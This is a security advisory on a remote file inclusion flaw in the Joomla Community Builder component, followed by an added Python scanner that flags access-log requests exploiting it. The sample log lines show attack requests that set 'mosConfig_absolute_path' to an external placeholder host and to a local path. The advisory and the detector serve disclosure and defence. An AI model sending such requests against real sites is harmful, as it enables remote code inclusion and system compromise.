Joomla Community Builder Component File Inclusion

SECUNIA ADVISORY ID:
SA21636

VERIFY ADVISORY:
http://secunia.com/advisories/21636/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
Community Builder 1.x (component for Joomla)
http://secunia.com/product/11706/

DESCRIPTION:
Matdhule has reported a vulnerability in the Community Builder
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter in
administrator/components/com_comprofiler/plugin.class.php is not
properly verified before it is used to include files. This can be
exploited to include arbitrary files from external and local
resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been reported in versions 1.0 RC 2 and 1.0.
Prior versions may also be affected.
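
A log check for the request pattern described above, as an added example that is not part of the advisory or of Community Builder: it flags access-log lines that request plugin.class.php directly with a "mosConfig_absolute_path" query parameter. The combined log format, the function names and the sample lines are assumptions constructed here; values sent by POST or cookie do not appear in such logs.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script and parameter named in the advisory.
SCRIPT = "administrator/components/com_comprofiler/plugin.class.php"
PARAM = "mosConfig_absolute_path"
# Request line of a combined-format access log entry (format assumed).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2006:10:00:00 +0000] '
    '"GET /index.php?option=com_comprofiler HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Sep/2006:10:00:05 +0000] "GET /administrator/components/'
    'com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://host.invalid/'
    ' HTTP/1.0" 200 312',
    '192.0.2.44 - - [01/Sep/2006:10:00:09 +0000] "GET /administrator//components/'
    'com_comprofiler/plugin.class.php?mosConfig_absolute_path=%2Ftmp%2F HTTP/1.0" 200 0',
]

def classify(line):
    """Return None, 'local' or 'external' for one access log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode percent-encoding, collapse repeated slashes, ignore case.
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    if not path.endswith("/" + SCRIPT.lower()):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    # A URL scheme in the value means the include would point at another host.
    if any(SCHEME_RE.match(v) for v in values):
        return "external"
    return "local"

def scan(lines):
    """Return (line_number, classification) for every flagged line."""
    return [(n, c) for n, line in enumerate(lines, 1) if (c := classify(line))]

if __name__ == "__main__":
    for number, kind in scan(SAMPLE_LOG):
        print(f"line {number}: {PARAM} supplied in query string ({kind} value)")
```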

SOLUTION:
Update to version 1.0.1.
http://www.joomlapolis.com/component/option,com_docman/task,cat_view/gid,46/Itemid,36/

PROVIDED AND/OR DISCOVERED BY:
Matdhule
